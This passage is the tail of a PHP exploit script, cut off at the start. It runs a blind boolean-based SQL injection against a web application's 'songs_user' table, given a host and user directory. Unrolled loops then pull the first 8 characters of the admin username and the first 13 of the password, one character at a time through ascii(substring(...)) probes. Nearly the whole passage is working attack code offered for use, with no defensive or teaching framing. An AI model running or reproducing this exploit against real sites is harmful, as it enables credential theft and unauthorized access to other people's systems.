`([^<]+)<\/center>/", $content, $out, PREG_PATTERN_ORDER); return base64_encode($out[1][0]); } $host1 = $argv[1]; $userdir1=$argv[2]; $truths = QAB_GET(QABANDI($host1,$userdir1,"' or 1='1")); $falses = QAB_GET(QABANDI($host1,$userdir1,"' or 1='2")); if($truths == $falses){ echo "Magic Quotes is on, exploit failed\n"; die; } echo "\n[q]Getting Admin User and Pass"; echo "\n username: "; for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from songs_user limit 0,1),1,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from songs_user limit 0,1),2,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from songs_user limit 0,1),3,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from songs_user limit 0,1),4,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from songs_user limit 0,1),5,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from songs_user limit 0,1),6,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from songs_user limit 0,1),7,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from songs_user limit 0,1),8,1))='".$i)); if ($qest == $truths) { echo chr($i); } } echo "\n password: "; for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),1,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),2,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),3,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),4,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),5,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),6,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),7,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),8,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),9,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),10,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),11,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),12,1))='".$i)); if ($qest == $truths) { echo chr($i); } } for ($i = 1; $i <= 122; $i++) { $qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from songs_user limit 0,1),13,1))='".$i)); if ($qest == $truths) { echo chr($i); } } echo "\n\n this exploit is made to give you the first 8 chars of username and first 13 of password"; ?> `

Query Builder